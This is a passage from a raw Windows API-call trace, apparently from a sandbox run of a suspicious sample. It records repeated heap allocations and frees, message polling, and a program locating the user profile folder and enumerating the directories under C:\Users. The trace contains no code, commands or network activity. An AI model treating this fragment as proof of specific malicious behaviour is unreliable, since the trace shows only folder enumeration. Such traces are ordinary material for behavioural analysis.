[0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32722a8 [0142.662] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.663] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.663] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.663] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.663] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.663] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.663] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.663] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.663] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.663] PathFindFileNameW (pszPath="") returned="" [0142.663] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.664] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.664] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.664] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1550 | out: hHeap=0x620000) returned 1 [0142.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a50 | out: hHeap=0x620000) returned 1 [0142.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a50 [0142.664] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a50 | out: hHeap=0x620000) returned 1 [0142.664] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.664] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0142.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283bf8 [0142.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283da8 [0142.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283bf8 | out: hHeap=0x620000) returned 1 [0142.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.665] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32722a8 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272430 [0142.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32722a8 | out: hHeap=0x620000) returned 1 [0142.665] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32722a8 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272468 [0142.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32722a8 | out: hHeap=0x620000) returned 1 [0142.665] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32722a8 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0142.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32722a8 | out: hHeap=0x620000) returned 1 [0142.665] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0142.665] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a50 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32722a8 [0142.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a50 | out: hHeap=0x620000) returned 1 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723c0 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x498) returned 0x32911d0 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a50 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1550 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1348 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ff0 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2158 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac20e0 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1b68 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1528 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1dc0 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2040 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ca8 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1848 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac18c0 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15c8 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1e88 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17f8 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1de8 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15a0 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c58 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724d8 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272510 [0142.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272548 [0142.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac2108 | out: hHeap=0x620000) returned 1 [0142.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cd0 | out: hHeap=0x620000) returned 1 [0142.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac15f0 | out: hHeap=0x620000) returned 1 [0142.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1be0 | out: hHeap=0x620000) returned 1 [0142.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1410 | out: hHeap=0x620000) returned 1 [0142.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21f8 | out: hHeap=0x620000) returned 1 [0142.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d70 | out: hHeap=0x620000) returned 1 [0142.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1ac8 | out: hHeap=0x620000) returned 1 [0142.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac2248 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1e10 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1870 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1fc8 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac2068 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1320 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac2270 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1eb0 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac13c0 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1618 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1438 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac13e8 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c30 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1b18 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a78 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283da8 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272430 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272468 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723c0 | out: hHeap=0x620000) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32722a8 | out: hHeap=0x620000) returned 1 [0142.667] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0142.667] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.667] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 